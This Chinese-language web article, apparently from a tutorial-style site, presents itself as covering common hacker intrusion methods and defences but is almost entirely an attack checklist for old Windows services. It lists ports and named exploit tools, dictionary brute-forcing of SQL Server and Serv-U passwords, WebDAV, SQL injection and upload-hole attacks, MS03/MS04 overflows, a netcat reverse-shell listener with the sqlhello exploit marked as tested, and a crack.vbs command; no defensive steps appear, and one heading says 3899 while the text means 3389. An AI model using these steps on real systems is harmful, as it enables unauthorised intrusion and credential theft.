常見的黑客入侵方法與防范

　　本文簡單介紹目前黑客最常使用的一些入侵工具及防御的方法，希望能對大家有所幫助，以助于大家能更好地防御黑客的攻擊，下面學(xué)習(xí)啦小編來告訴你吧!

　　1. 利用4899端口入侵

　　4899端口是一個遠(yuǎn)程控制軟件(remote administrator)服務(wù)端監(jiān)聽的端口，他不能算是一個木馬程序，但是具有遠(yuǎn)程控制功能，通常殺毒軟件是無法查出它來的

　　用4899過濾器.exe，掃描空口令的機器

　　2. 利用3899的入侵

　　對很早的機器，可以試試3389的溢出

　　對2000的機器，可以試試字典暴破。

　　3.利用1433端口入侵

　　1433端口，是SQL Server默認(rèn)的端口，SQL Server服務(wù)使用兩個端口：TCP-1433、UDP-1434。其中1433用于供SQL Server對外提供服務(wù)，1434用于向請求者返回SQL Server使用了哪個TCP/IP端口。

　　scanport.exe 查有1433的機器

　　SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)

　　最后 SQLTools.exe入侵

　　對sql的sp2及以下的系統(tǒng)，可用sql的hello 溢出漏洞入侵。

　　nc -vv -l -p 本機端口 sqlhelloF.exe 入侵ip 1433 本機ip 本機端口

　　(以上反向的，測試成功)

　　sqlhelloz.exe 入侵ip 1433 (這個是正向連接)

　　4. 利用80端口入侵

　　80端口是為HTTP(HyperText Transport Protocol)即超文本傳輸協(xié)議開放的，此為上網(wǎng)沖浪使用次數(shù)最多的協(xié)議，主要用于WWW(World Wide Web)即萬維網(wǎng)傳輸信息的協(xié)議。可以通過HTTP地址(即常說的“網(wǎng)址”)加“:80”來訪問網(wǎng)站，因為瀏覽網(wǎng)頁服務(wù)默認(rèn)的端口號都是80，因此只需輸入網(wǎng)址即可，不用輸入“:80”了。

　　對sp3以前的機器，可以用webdav入侵;

　　對bbs論壇，可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)

　　可以利用SQL進(jìn)行注入。(小榕的注入軟件)。

　　5. 利用serv-u入侵(21端口)

　　21端口主要用于FTP(File Transfer Protocol，文件傳輸協(xié)議)服務(wù)，F(xiàn)TP服務(wù)主要是為了在兩臺計算機之間實現(xiàn)文件的上傳與下載，一臺計算機作為FTP客戶端，另一臺計算機作為FTP服務(wù)器，可以采用匿名(anonymous)登錄和授權(quán)用戶名與密碼登錄兩種方式登錄FTP服務(wù)器。

　　對5. 004及以下系統(tǒng)，可用溢出入侵。(serv5004.exe)

　　對5.1.0.0及以下系統(tǒng)，可用本地提升權(quán)限。(servlocal.exe)

　　對serv-u的MD5加密密碼，可以用字典暴破。(crack.vbs)

　　輸入一個被serv-u加密的密碼(34位長)，通過與字典檔(dict.txt)的比較，得到密碼。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

　　6. 利用554端口

　　用real554.exe入侵。

　　7. 利用6129端口

　　用DameWare6129.exe入侵。

　　8. 利用系統(tǒng)漏洞

　　利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，

　　進(jìn)行溢出入侵。

　　9. 利用3127等端口

　　可以利用doom病毒開的端口，用nodoom.exe入侵。(可用mydoomscan.exe查)。

　　10. 利用其他入侵

　　利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。